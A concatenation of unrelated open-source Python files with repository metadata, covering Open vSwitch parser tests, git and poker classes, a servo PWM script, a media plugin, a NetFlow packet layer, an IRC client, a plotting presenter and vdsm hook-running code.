self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def _getBridgePortStatusCmd(self, exitCode, filename):
points = []
cmd = self._getCmd(
'',
'/usr/bin/sudo /usr/bin/ovsdb-tool show-log',
exitCode, filename, points)
return cmd
def testBridgePortStatus(self):
parser = BPStatusParser()
results = ParsedResults()
parser.processResults(
self._getBridgePortStatusCmd(0, 'bridge_port_status.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 4)
def _getInterfaceStatusCmd(self, id, exitCode, filename):
points = []
cmd = self._getCmd(
id,
'/usr/bin/sudo /usr/bin/ovs-vsctl --columns=_uuid,admin_state,link_state list interface',
exitCode, filename, points)
return cmd
def testInterfaceStatusAUPIUP(self):
parser = IFStatusParser()
results = ParsedResults()
parser.processResults(
self._getInterfaceStatusCmd('interface-35da03b8-1f47-4e82-b89a-d06a866d522f',
0, 'iface_status.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def testInterfaceStatusAUPIDOWN(self):
parser = IFStatusParser()
results = ParsedResults()
parser.processResults(
self._getInterfaceStatusCmd('interface-23128125-cc93-492e-9afd-b75334ad1cc8',
0, 'iface_status.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def testInterfaceStatusADOWNIDOWN(self):
parser = IFStatusParser()
results = ParsedResults()
parser.processResults(
self._getInterfaceStatusCmd('interface-fb498511-3c18-4483-85d3-c4b3103719ca',
0, 'iface_status.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def test_suite():
from unittest import TestSuite, makeSuite
suite = TestSuite()
suite.addTest(makeSuite(TestParser))
return suite
|
zenoss/ZenPacks.zenoss.OpenvSwitch
|
ZenPacks/zenoss/OpenvSwitch/tests/testParser.py
|
Python
|
gpl-2.0
| 8,979
|
# -*- coding: utf-8 -*-
#
# Copyright 2013 The cygit2 contributors
#
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# In addition to the permissions in the GNU General Public License,
# the authors give you unlimited permission to link the compiled
# version of this file into combinations with other programs,
# and to distribute those combinations without any restriction
# coming from the use of this file. (The General Public License
# restrictions do apply in other respects; for example, they cover
# modification of the file, and distribution when not linked into
# a combined executable.)
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
import unittest
from cygit2.tests.fixtures import Cygit2RepositoryFixture
class TestCommit(Cygit2RepositoryFixture):
def setUp(self):
super(TestCommit, self).setUp()
ref = self.repo.lookup_reference('refs/heads/master')
self.commit = self.repo.lookup_commit(ref.oid)
def tearDown(self):
del self.commit
super(TestCommit, self).tearDown()
def test_get_committer(self):
committer = self.commit.committer
self.assertEqual(committer.name, 'Test User')
self.assertEqual(committer.email, 'test@users.invalid')
def test_get_author(self):
author = self.commit.author
self.assertEqual(author.name, 'Other User')
self.assertEqual(author.email, 'other@users.invalid')
if __name__ == '__main__':
unittest.main()
|
sjagoe/cygit2
|
cygit2/tests/test_commit.py
|
Python
|
gpl-2.0
| 2,027
|
class PlayerHand:
def __init__(self, player):
self.player = player
self.hand = []
def getHand(self):
return self.hand
def getPlayer(self):
return self.player
def addCard(self, card):
self.hand.append(card)
def discardCard(self, card):
self.hand.remove(card)
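# Minimal usage sketch (the card objects are assumed to come from a deck
# model elsewhere in the package):
#
# hand = PlayerHand('alice')
# hand.addCard(card)
# hand.discardCard(card)
# assert hand.getHand() == []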
|
zmetcalf/Triple-Draw-Deuce-to-Seven-Lowball-Limit
|
triple_draw_poker/model/PlayerHand.py
|
Python
|
gpl-2.0
| 331
|
#!/usr/bin/python
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.OUT)
GPIO.setwarnings(False)
pwm = GPIO.PWM(18, 50) # channel = 18, frequency = 50Hz
# duty cycle is Pulse Width divided by Period
# Period at 50Hz is 0.02 seconds, i.e. 20 milliseconds or 20000 microseconds
PERIOD = float(20000.0)
# to center the servo, a 1500 microsecond pulse is used
# therefore, duty cycle = 1500 / 20000 = 0.075 = 7.5 %
def calc_dc(pulse_in_us):
return ((float(pulse_in_us) / PERIOD)*100.0)
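# Worked example: the 1500 microsecond centering pulse gives
# calc_dc(1500) == (1500.0 / 20000.0) * 100.0 == 7.5 (percent),
# matching the 7.5 % duty cycle mentioned above.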
pwm.start(calc_dc(500))
delay_period = 0.01
try:
while True:
for microseconds in range(50, 250):
duty_cycle = calc_dc(microseconds*10)
print('pulse1: '+str(microseconds*10)+' duty cycle: '+str(duty_cycle))
pwm.ChangeDutyCycle(duty_cycle)
time.sleep(delay_period)
except KeyboardInterrupt:
pwm.stop()
|
griffegg/servo_motors
|
servo-run-forever.py
|
Python
|
gpl-2.0
| 874
|
#===============================================================================
# Make global object available
#===============================================================================
import mediaitem
import contextmenu
import chn_class
from regexer import Regexer
from helpers import xmlhelper
from logger import Logger
from urihandler import UriHandler
#===============================================================================
# main Channel Class
#===============================================================================
class Channel(chn_class.Channel):
#===============================================================================
# define class variables
#===============================================================================
def InitialiseVariables(self, channelInfo):
"""Used for the initialisation of user defined parameters.
All should be present, but can be adjusted. If overridden by a derived class,
first call chn_class.Channel.InitialiseVariables(self, channelInfo) to make sure all
variables are initialised.
Returns:
True if OK
"""
# call base function first to ensure all variables are there
chn_class.Channel.InitialiseVariables(self, channelInfo)
self.mainListUri = "http://www.rtl.nl/system/s4m/ipadfd/d=ipad/fmt=adaptive/"
# there also is a nettv stream: http://iptv.rtl.nl/nettv/feed.xml
self.baseUrl = "http://www.rtl.nl/service/gemist/device/ipad/feed/index.xml"
self.noImage = "rtlimage.png"
self.requiresLogon = False
self.episodeSort = True
self.defaultPlayer = 'dvdplayer'
self.contextMenuItems = []
self.contextMenuItems.append(contextmenu.ContextMenuItem("Play using Mplayer", "CtMnPlayMplayer", itemTypes="video", completeStatus=True))
self.contextMenuItems.append(contextmenu.ContextMenuItem("Play using DVDPlayer", "CtMnPlayDVDPlayer", itemTypes="video", completeStatus=True))
self.episodeItemRegex = '<serieitem><itemsperserie_url>([^<]+)</itemsperserie_url><serienaam>([^<]+)</serienaam><seriescoverurl>([^<]+)</seriescoverurl><serieskey>([^<]+)</serieskey>'
self.videoItemRegex = '(<item>([\w\W]+?)</item>)'
self.mediaUrlRegex = 'BANDWIDTH=(\d+)\d{3}[^\n]+\W+([^\n]+.m3u8)'
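# (The mediaUrlRegex drops the last three digits of the BANDWIDTH value,
# i.e. it captures roughly kbit/s, together with the variant .m3u8 URL from
# an HLS master playlist.)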
#==============================================================================
# non standard items
return True
def CreateEpisodeItem(self, resultSet):
"""Creates a new MediaItem for an episode
Arguments:
resultSet : list[string] - the resultSet of the self.episodeItemRegex
Returns:
A new MediaItem of type 'folder'
This method creates a new MediaItem from the Regular Expression
results <resultSet>. The method should be implemented by derived classes
and is specific to the channel.
"""
# Logger.Trace("iRTL :: %s", resultSet)
item = mediaitem.MediaItem(resultSet[1], resultSet[0])
item.thumbUrl = resultSet[2]
item.icon = self.folderIcon
item.complete = True
return item
def CreateVideoItem(self, resultSet):
"""Creates a MediaItem of type 'video' using the resultSet from the regex.
Arguments:
resultSet : tuple (string) - the resultSet of the self.videoItemRegex
Returns:
A new MediaItem of type 'video' or 'audio' (despite the method's name)
This method creates a new MediaItem from the Regular Expression or Json
results <resultSet>. The method should be implemented by derived classes
and is specific to the channel.
If the item is completely processed and no further data needs to be fetched,
the self.complete property should be set to True. If not set to True, the
self.UpdateVideoItem method is called when the item is focused or selected
for playback.
"""
xml = resultSet[0]
xmlData = xmlhelper.XmlHelper(xml)
name = "%s - %s" % (xmlData.GetSingleNodeContent("episodetitel"), xmlData.GetSingleNodeContent("title"))
thumb = xmlData.GetSingleNodeContent("thumbnail")
url = xmlData.GetSingleNodeContent("movie")
date = xmlData.GetSingleNodeContent("broadcastdatetime")
item = mediaitem.MediaItem(name, url)
item.description = name
item.icon = self.icon
item.thumb = self.noImage
item.thumbUrl = thumb
item.type = 'video'
item.SetDate(date[0:4], date[5:7], date[8:10], date[11:13], date[14:16], date[17:20])
item.complete = False
return item
def UpdateVideoItem(self, item):
"""Updates an existing MediaItem with more data.
Arguments:
item : MediaItem - the MediaItem that needs to be updated
Returns:
The original item with more data added to its properties.
Used to update non-complete MediaItems (self.complete = False). This
could include opening the item's URL to fetch more data and then processing
that data or retrieving its real media-URL.
The method should at least:
* cache the thumbnail to disk (use self.noImage if no thumb is available).
* set at least one MediaItemPart with a single MediaStream.
* set self.complete = True.
if the returned item does not have a MediaItemPart then the self.complete flag
will automatically be set back to False.
"""
Logger.Debug('Starting UpdateVideoItem for %s (%s)', item.name, self.channelName)
item.thumb = self.CacheThumb(item.thumbUrl)
# load the details.
playlistdata = UriHandler.Open(item.url, proxy=self.proxy)
urls = Regexer.DoRegex(self.mediaUrlRegex, playlistdata)
# baseUrl from: http://us.rtl.nl/Thu14.RTL_D_110818_143155_190_Britt_Ymke_op_d.MiMe.ssm/Thu14.RTL_D_110818_143155_190_Britt_Ymke_op_d.MiMe.m3u8
baseUrl = item.url[0:item.url.rfind("/")]
Logger.Debug("Using baseUrl: %s", baseUrl)
part = item.CreateNewEmptyMediaPart()
for url in urls:
# Logger.Trace(url)
if "http" in url[1]:
mediaUrl = url[1]
else:
mediaUrl = "%s/%s" % (baseUrl, url[1])
part.AppendMediaStream(mediaUrl, url[0])
item.complete = True
return item
|
SMALLplayer/smallplayer-image-creator
|
storage/.xbmc/addons/net.rieter.xot.smallplayer.channel.rtlnl/rtlipad/chn_rtlipad.py
|
Python
|
gpl-2.0
| 6,614
|
#!/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'eduardo'
import os
import os.path
import logging
from .. import config
from .. import LBSociam
# Set to test environment
config.environment = 'test'
lbs = LBSociam()
test_dir = os.path.dirname(os.path.realpath(__file__))
log = logging.getLogger()
def setup_package():
"""
Setup test data for the package
"""
pass
def teardown_package():
"""
Remove test data
"""
pass
|
lightbase/LBSociam
|
lbsociam/tests/__init__.py
|
Python
|
gpl-2.0
| 461
|
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <phil@secdev.org>
## This program is published under a GPLv2 license
"""
Cisco NetFlow protocol v1
"""
from kamene.fields import *
from kamene.packet import *
# Cisco Netflow Protocol version 1
class NetflowHeader(Packet):
name = "Netflow Header"
fields_desc = [ ShortField("version", 1) ]
class NetflowHeaderV1(Packet):
name = "Netflow Header V1"
fields_desc = [ ShortField("count", 0),
IntField("sysUptime", 0),
IntField("unixSecs", 0),
IntField("unixNanoSeconds", 0) ]
class NetflowRecordV1(Packet):
name = "Netflow Record"
fields_desc = [ IPField("ipsrc", "0.0.0.0"),
IPField("ipdst", "0.0.0.0"),
IPField("nexthop", "0.0.0.0"),
ShortField("inputIfIndex", 0),
ShortField("outputIfIndex", 0),
IntField("dpkts", 0),
IntField("dbytes", 0),
IntField("starttime", 0),
IntField("endtime", 0),
ShortField("srcport", 0),
ShortField("dstport", 0),
ShortField("padding", 0),
ByteField("proto", 0),
ByteField("tos", 0),
IntField("padding1", 0),
IntField("padding2", 0) ]
bind_layers( NetflowHeader, NetflowHeaderV1, version=1)
bind_layers( NetflowHeaderV1, NetflowRecordV1, )
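# A minimal usage sketch (field values illustrative): stack a v1 header on a
# single flow record; the bind_layers calls above make dissection of such a
# packet automatic when version == 1.
#
# pkt = (NetflowHeader() / NetflowHeaderV1(count=1) /
#        NetflowRecordV1(ipsrc="10.0.0.1", ipdst="10.0.0.2",
#                        srcport=1234, dstport=80, proto=6))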
|
phaethon/scapy
|
kamene/layers/netflow.py
|
Python
|
gpl-2.0
| 1,595
|
'''
Code taken and adapted from:
The University of Manchester Computer Science
COMP18111 - Lab Exercise 3
version: 2011/2012
ex3.py - Module for ex3 - David Thorne / AIG / 15-01-2009
'''
import sys
from serverutils import Client
class IRCClient(Client):
def onMessage(self, socket, message):
# *** process incoming messages here ***
print message
return True
# Parse the IP address and port you wish to connect to.
ip = "0.0.0.0"
port = int(sys.argv[1])
# Create an IRC client.
client = IRCClient()
# Start the client
client.start(ip, port)
# *** register your client here, e.g. ***
# client.send('/user %s' % screenName)
while client.isRunning():
try:
command = raw_input("> ").strip()
# *** process input from the user in a loop here ***
# *** use client.send(someMessage) to send messages to the server
client.send(command)
except:
client.stop()
client.stop()
|
radujipa/PiDroid
|
PiDroidRPi/source/client.py
|
Python
|
gpl-2.0
| 949
|
# Copyright © 2020, Joseph Berry, Rico Tabor (opendrop.dev@gmail.com)
# OpenDrop is released under the GNU GPL License. You are free to
# modify and distribute the code, but always under the same license
# (i.e. you cannot make commercial derivatives).
#
# If you use this software in your research, please cite the following
# journal articles:
#
# J. D. Berry, M. J. Neeson, R. R. Dagastine, D. Y. C. Chan and
# R. F. Tabor, Measurement of surface and interfacial tension using
# pendant drop tensiometry. Journal of Colloid and Interface Science 454
# (2015) 226–237. https://doi.org/10.1016/j.jcis.2015.05.012
#
# E. Huang, T. Denning, A. Skoufis, J. Qi, R. R. Dagastine, R. F. Tabor
# and J. D. Berry, OpenDrop: Open-source software for pendant drop
# tensiometry & contact angle measurements, submitted to the Journal of
# Open Source Software
#
# These citations help us not only to understand who is using and
# developing OpenDrop, and for what purpose, but also to justify
# continued development of this code and other open source resources.
#
# OpenDrop is distributed WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details. You
# should have received a copy of the GNU General Public License along
# with this software. If not, see <https://www.gnu.org/licenses/>.
from typing import Iterable, Sequence, Tuple
from gi.repository import Gtk, GObject
from injector import inject
from matplotlib import ticker
from matplotlib.backends.backend_gtk3cairo import FigureCanvasGTK3Cairo as FigureCanvas
from matplotlib.figure import Figure
from opendrop.app.ift.services.analysis import PendantAnalysisJob
from opendrop.appfw import Presenter, TemplateChild, component, install
from .services.graphs import IFTReportGraphsService
@component(
template_path='./graphs.ui',
)
class IFTReportGraphsPresenter(Presenter[Gtk.Stack]):
spinner: TemplateChild[Gtk.Spinner] = TemplateChild('spinner')
figure_container: TemplateChild[Gtk.Container] = TemplateChild('figure_container')
_analyses = ()
@inject
def __init__(self, graphs_service: IFTReportGraphsService) -> None:
self.graphs_service = graphs_service
def after_view_init(self) -> None:
figure = Figure(tight_layout=False)
self.figure = figure
self.figure_canvas = FigureCanvas(figure)
self.figure_canvas.props.hexpand = True
self.figure_canvas.props.vexpand = True
self.figure_canvas.props.visible = True
self.figure_container.add(self.figure_canvas)
self.figure_canvas_mapped = False
self.figure_canvas.connect('map', self.hdl_canvas_map)
self.figure_canvas.connect('unmap', self.hdl_canvas_unmap)
self.figure_canvas.connect('size-allocate', self.hdl_canvas_size_allocate)
self.ift_axes, volume_axes, surface_area_axes = figure.subplots(3, 1, sharex='col')
self.ift_axes.set_ylabel('IFT [mN/m]')
self.ift_axes.tick_params(axis='x', direction='inout')
volume_axes.xaxis.set_ticks_position('both')
volume_axes.tick_params(axis='x', direction='inout')
volume_axes.set_ylabel('V [mm³]')
surface_area_axes.xaxis.set_ticks_position('both')
surface_area_axes.tick_params(axis='x', direction='inout')
surface_area_axes.set_ylabel('SA [mm²]')
self.ift_axes.tick_params(axis='y', left=False, labelleft=False, right=True, labelright=True)
volume_axes.tick_params(axis='y', left=False, labelleft=False, right=True, labelright=True)
surface_area_axes.tick_params(axis='y', left=False, labelleft=False, right=True, labelright=True)
self.ift_axes.grid(axis='x', linestyle='--', color="#dddddd")
volume_axes.grid(axis='x', linestyle='--', color="#dddddd")
surface_area_axes.grid(axis='x', linestyle='--', color="#dddddd")
self.ift_axes.grid(axis='y', linestyle='-', color="#dddddd")
volume_axes.grid(axis='y', linestyle='-', color="#dddddd")
surface_area_axes.grid(axis='y', linestyle='-', color="#dddddd")
# Format the labels to scale to the right units.
self.ift_axes.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, pos: '{:.4g}'.format(x * 1e3)))
volume_axes.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, pos: '{:.4g}'.format(x * 1e9)))
surface_area_axes.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, pos: '{:.4g}'.format(x * 1e6)))
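# (Assumption: the plotted data are in SI base units, so the factors above
# rescale N/m -> mN/m (1e3), m^3 -> mm^3 (1e9) and m^2 -> mm^2 (1e6) to
# match the axis labels set earlier.)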
self.ift_line = self.ift_axes.plot([], marker='o', color='red')[0]
self.volume_line = volume_axes.plot([], marker='o', color='blue')[0]
self.surface_area_line = surface_area_axes.plot([], marker='o', color='green')[0]
self.graphs_service.connect('notify::ift', self.hdl_model_data_changed)
self.graphs_service.connect('notify::volume', self.hdl_model_data_changed)
self.graphs_service.connect('notify::surface-area', self.hdl_model_data_changed)
self.hdl_model_data_changed()
def hdl_canvas_map(self, *_) -> None:
self.figure_canvas_mapped = True
self.figure_canvas.draw_idle()
def hdl_canvas_unmap(self, *_) -> None:
self.figure_canvas_mapped = False
def hdl_canvas_size_allocate(self, *_) -> None:
self.figure.tight_layout(pad=2.0, h_pad=0)
self.figure.subplots_adjust(hspace=0)
@install
@GObject.Property
def analyses(self) -> Sequence[PendantAnalysisJob]:
return self._analyses
@analyses.setter
def analyses(self, analyses: Iterable[PendantAnalysisJob]) -> None:
self._analyses = tuple(analyses)
self.graphs_service.set_analyses(analyses)
def hdl_model_data_changed(self, *args) -> None:
ift_data = self.graphs_service.ift
volume_data = self.graphs_service.volume
surface_area_data = self.graphs_service.surface_area
if (
len(ift_data[0]) <= 1 and
len(volume_data[0]) <= 1 and
len(surface_area_data[0]) <= 1
):
self.show_waiting_placeholder()
return
self.hide_waiting_placeholder()
self.set_ift_data(ift_data)
self.set_volume_data(volume_data)
self.set_surface_area_data(surface_area_data)
if self.figure_canvas_mapped:
self.figure.tight_layout(pad=2.0, h_pad=0)
self.figure.subplots_adjust(hspace=0)
self.figure_canvas.draw_idle()
def show_waiting_placeholder(self) -> None:
self.host.set_visible_child(self.spinner)
self.spinner.start()
def hide_waiting_placeholder(self) -> None:
self.host.set_visible_child(self.figure_container)
self.spinner.stop()
def set_ift_data(self, data: Sequence[Tuple[float, float]]) -> None:
if len(data[0]) <= 1:
return
self.ift_line.set_data(data)
self.update_xlim()
self.ift_axes.relim()
self.ift_axes.margins(y=0.1)
def set_volume_data(self, data: Sequence[Tuple[float, float]]) -> None:
if len(data[0]) <= 1:
return
self.volume_line.set_data(data)
self.update_xlim()
self.volume_line.axes.relim()
self.volume_line.axes.margins(y=0.1)
def set_surface_area_data(self, data: Sequence[Tuple[float, float]]) -> None:
if len(data[0]) <= 1:
return
self.surface_area_line.set_data(data)
self.update_xlim()
self.surface_area_line.axes.relim()
self.surface_area_line.axes.margins(y=0.1)
def update_xlim(self) -> None:
all_xdata = (
*self.ift_line.get_xdata(),
*self.volume_line.get_xdata(),
*self.surface_area_line.get_xdata(),
)
if len(all_xdata) <= 1:
return
xmin = min(all_xdata)
xmax = max(all_xdata)
if xmin == xmax:
return
self.ift_axes.set_xlim(xmin, xmax)
|
ricotabor/opendrop
|
opendrop/app/ift/report/graphs/graphs.py
|
Python
|
gpl-2.0
| 8,059
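The FuncFormatter calls above convert SI base units into display units at draw time (N/m to mN/m via 1e3, m³ to mm³ via 1e9, m² to mm² via 1e6) instead of rescaling the data itself. A minimal standalone sketch of that pattern, assuming plain matplotlib and made-up sample values:

import matplotlib.pyplot as plt
from matplotlib import ticker

fig, ax = plt.subplots()
ax.plot([0, 1, 2], [0.0, 0.5e-6, 2.0e-6], marker='o')  # areas stored in m^2

# Scale tick labels by 1e6 so the axis reads mm^2 while the data stays in SI units.
ax.yaxis.set_major_formatter(
    ticker.FuncFormatter(lambda x, pos: '{:.4g}'.format(x * 1e6)))
ax.set_ylabel('SA [mm²]')
plt.show()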
|
# R-1.1: n is a multiple of m when n == m * i for some integer i
def is_multiple(n, m):
    return n % m == 0
if __name__ == '__main__':
# test1
print('n=27,m=1:')
print(is_multiple(27, 1))
# test2
print('n=28,m=1:')
print(is_multiple(28, 1))
# test3
print('n=270,m=10:')
print(is_multiple(270, 10))
|
maxiee/DataStructuresAlgorithmsPythonExercises
|
chapter1/r_1_1.py
|
Python
|
gpl-2.0
| 294
|
#
# Copyright 2010-2011 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
from __future__ import print_function
from vdsm import utils
import glob
import hashlib
import itertools
import json
import logging
import os
import os.path
import sys
import tempfile
from vdsm.constants import P_VDSM_HOOKS, P_VDSM
class HookError(Exception):
pass
# dir path is relative to '/' for test purposes
# otherwise path is relative to P_VDSM_HOOKS
def _scriptsPerDir(dir):
if (dir[0] == '/'):
path = dir
else:
path = P_VDSM_HOOKS + dir
return [s for s in glob.glob(path + '/*')
if os.access(s, os.X_OK)]
_DOMXML_HOOK = 1
_JSON_HOOK = 2
def _runHooksDir(data, dir, vmconf={}, raiseError=True, params={},
hookType=_DOMXML_HOOK):
scripts = _scriptsPerDir(dir)
scripts.sort()
if not scripts:
return data
data_fd, data_filename = tempfile.mkstemp()
try:
if hookType == _DOMXML_HOOK:
os.write(data_fd, data or '')
elif hookType == _JSON_HOOK:
os.write(data_fd, json.dumps(data))
os.close(data_fd)
scriptenv = os.environ.copy()
# Update the environment using params and custom configuration
env_update = [params.iteritems(),
vmconf.get('custom', {}).iteritems()]
# Encode custom properties to UTF-8 and save them to scriptenv
# Pass str objects (byte-strings) without any conversion
for k, v in itertools.chain(*env_update):
try:
if isinstance(v, unicode):
scriptenv[k] = v.encode('utf-8')
else:
scriptenv[k] = v
except UnicodeDecodeError:
pass
if vmconf.get('vmId'):
scriptenv['vmId'] = vmconf.get('vmId')
ppath = scriptenv.get('PYTHONPATH', '')
scriptenv['PYTHONPATH'] = ':'.join(ppath.split(':') + [P_VDSM])
if hookType == _DOMXML_HOOK:
scriptenv['_hook_domxml'] = data_filename
elif hookType == _JSON_HOOK:
scriptenv['_hook_json'] = data_filename
errorSeen = False
for s in scripts:
rc, out, err = utils.execCmd([s], raw=True,
env=scriptenv)
logging.info(err)
if rc != 0:
errorSeen = True
if rc == 2:
break
elif rc > 2:
logging.warn('hook returned unexpected return code %s', rc)
if errorSeen and raiseError:
raise HookError(err)
with open(data_filename) as f:
final_data = f.read()
finally:
os.unlink(data_filename)
if hookType == _DOMXML_HOOK:
return final_data
elif hookType == _JSON_HOOK:
return json.loads(final_data)
def before_device_create(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'before_device_create', vmconf=vmconf,
params=customProperties)
def after_device_create(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'after_device_create', vmconf=vmconf,
params=customProperties, raiseError=False)
def before_device_destroy(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'before_device_destroy', vmconf=vmconf,
params=customProperties)
def after_device_destroy(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'after_device_destroy', vmconf=vmconf,
params=customProperties, raiseError=False)
def before_vm_start(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_start', vmconf=vmconf)
def after_vm_start(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_start',
vmconf=vmconf, raiseError=False)
def before_vm_cont(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_cont', vmconf=vmconf)
def after_vm_cont(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_cont',
vmconf=vmconf, raiseError=False)
def before_vm_pause(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_pause', vmconf=vmconf)
def after_vm_pause(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_pause',
vmconf=vmconf, raiseError=False)
def before_device_migrate_source(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'before_device_migrate_source',
vmconf=vmconf, params=customProperties)
def after_device_migrate_source(devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'after_device_migrate_source',
vmconf=vmconf, params=customProperties,
raiseError=False)
def before_device_migrate_destination(
devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'before_device_migrate_destination',
vmconf=vmconf, params=customProperties)
def after_device_migrate_destination(
devicexml, vmconf={}, customProperties={}):
return _runHooksDir(devicexml, 'after_device_migrate_destination',
vmconf=vmconf, params=customProperties,
raiseError=False)
def before_vm_migrate_source(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_migrate_source', vmconf=vmconf)
def after_vm_migrate_source(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_migrate_source', vmconf=vmconf,
raiseError=False)
def before_vm_migrate_destination(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_migrate_destination', vmconf=vmconf)
def after_vm_migrate_destination(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_migrate_destination', vmconf=vmconf,
raiseError=False)
def before_vm_hibernate(domxml, vmconf={}):
return _runHooksDir(domxml, 'before_vm_hibernate', vmconf=vmconf)
def after_vm_hibernate(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_hibernate', vmconf=vmconf,
raiseError=False)
def before_vm_dehibernate(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'before_vm_dehibernate', vmconf=vmconf,
params=params)
def after_vm_dehibernate(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'after_vm_dehibernate', vmconf=vmconf,
raiseError=False, params=params)
def before_vm_destroy(domxml, vmconf={}):
return _runHooksDir(None, 'before_vm_destroy', vmconf=vmconf,
raiseError=False)
def after_vm_destroy(domxml, vmconf={}):
return _runHooksDir(domxml, 'after_vm_destroy', vmconf=vmconf,
raiseError=False)
def before_vm_set_ticket(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'before_vm_set_ticket', vmconf=vmconf,
raiseError=False, params=params)
def after_vm_set_ticket(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'after_vm_set_ticket', vmconf=vmconf,
raiseError=False, params=params)
def before_update_device(devxml, vmconf={}, params={}):
return _runHooksDir(devxml, 'before_update_device', vmconf=vmconf,
params=params)
def after_update_device(devxml, vmconf={}, params={}):
return _runHooksDir(devxml, 'after_update_device', vmconf=vmconf,
raiseError=False, params=params)
def after_update_device_fail(devxml, vmconf={}, params={}):
return _runHooksDir(devxml, 'after_update_device_fail', vmconf=vmconf,
raiseError=False, params=params)
def before_nic_hotplug(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'before_nic_hotplug', vmconf=vmconf,
params=params)
def after_nic_hotplug(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'after_nic_hotplug', vmconf=vmconf,
params=params, raiseError=False)
def before_nic_hotunplug(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'before_nic_hotunplug', vmconf=vmconf,
params=params)
def after_nic_hotunplug(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'after_nic_hotunplug', vmconf=vmconf,
params=params, raiseError=False)
def after_nic_hotplug_fail(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'after_nic_hotplug_fail', vmconf=vmconf,
params=params, raiseError=False)
def after_nic_hotunplug_fail(nicxml, vmconf={}, params={}):
return _runHooksDir(nicxml, 'after_nic_hotunplug_fail', vmconf=vmconf,
params=params, raiseError=False)
def before_disk_hotplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'before_disk_hotplug', vmconf=vmconf,
params=params)
def after_disk_hotplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'after_disk_hotplug', vmconf=vmconf,
params=params, raiseError=False)
def before_disk_hotunplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'before_disk_hotunplug', vmconf=vmconf,
params=params)
def after_disk_hotunplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'after_disk_hotunplug', vmconf=vmconf,
params=params, raiseError=False)
def before_set_num_of_cpus(vmconf={}, params={}):
return _runHooksDir(None, 'before_set_num_of_cpus', vmconf=vmconf,
params=params, raiseError=True)
def after_set_num_of_cpus(vmconf={}, params={}):
return _runHooksDir(None, 'after_set_num_of_cpus', vmconf=vmconf,
params=params, raiseError=False)
def before_memory_hotplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'before_memory_hotplug', vmconf=vmconf,
params=params)
def after_memory_hotplug(domxml, vmconf={}, params={}):
return _runHooksDir(domxml, 'after_memory_hotplug', vmconf=vmconf,
params=params, raiseError=False)
def before_vdsm_start():
return _runHooksDir(None, 'before_vdsm_start', raiseError=False)
def after_vdsm_stop():
return _runHooksDir(None, 'after_vdsm_stop', raiseError=False)
def before_network_setup(network_config_dict):
return _runHooksDir(network_config_dict, 'before_network_setup',
hookType=_JSON_HOOK)
def after_network_setup(network_config_dict):
return _runHooksDir(network_config_dict, 'after_network_setup',
raiseError=False, hookType=_JSON_HOOK)
def after_network_setup_fail(network_config_dict):
